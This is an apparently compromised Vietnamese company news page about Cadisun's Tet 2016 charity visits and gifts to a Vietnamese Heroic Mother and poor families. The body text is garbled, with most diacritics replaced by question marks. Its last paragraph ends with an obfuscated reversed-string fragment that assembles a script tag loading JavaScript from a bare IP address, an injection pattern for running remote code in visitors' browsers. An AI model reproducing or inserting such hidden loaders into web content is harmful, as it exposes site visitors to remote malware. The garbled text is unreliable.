CADI-SUN thăm hỏi, phụng dưỡng mẹ Việt Nam anh hùng nhân dịp Tết Bính Thân


Nhân d?p T?t Bính Thân 2016, ngày 2/2, Ông Hu?nh T?n Quy?n-Pho? tô?ng gia?m ?ô?c/Pho? chu? ti?ch th???ng tr??c Công ?oa?n Công ty Cadisun cu?ng v??i ca?c ?ô?ng chi? la?nh ?a?o UBND ph???ng H? ?ình ?ã ??n th?m h?i, t?ng quà cho M? Vi?t Nam Anh hùng Lê Th? Quýnh.


Lãnh ??o Ph??ng H? ?Ình và Công ty CADI-SUN kính chúc M? và gia ?ình n?m m?i M?nh kh?e- An khang- Th?nh v??ng


Ông Hu?nh T?n Quy?n-Pho? tô?ng gia?m ?ô?c/Pho? chu? ti?ch th???ng tr??c Công ?oa?n Công ty Cadisun t?ng quà cho M? Vi?t Nam Anh Hùng Lê Th? Quýnh

Thay m??t la?nh ?a?o Công ty, Ông Huy?nh Tâ?n Quyê?n ?ã ân c?n th?m h?i s?c kh?e, ??ng viên tinh th?n và kính chúc M? s?ng lâu, s?ng kh?e và ma?i là t?m g??ng sáng cho l??p l??p thê? hê? con cha?u h?c t?p, noi theo. Cu?ng nhân di?p na?y công ty Cadisun ?ã trao t?ng M? sô? tiê?n phu?ng d???ng 6 tha?ng ??u n?m tr? giá 6.000.000 ?ô?ng.

C?ng nhân d?p T?t Bính Thân 2016, ngày 22/1 v?a qua Công ty CADI-SUN ?ã ph?i h?p v?i UBND qu?n Thanh Xuân, Phòng L?-TB&XH – Qu? thi?n tâm trao t?ng h?n 500 su?t quà cho các gia ?ình có hoàn c?nh khó kh?n, tr? em nghèo v??t khó. ?ây là ho?t ??ng th??ng niên c?a Công ty CADI-SUN trong nh?ng d?p T?t ??n, Xuân v?. 87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))


  • By admin
  • Comments closed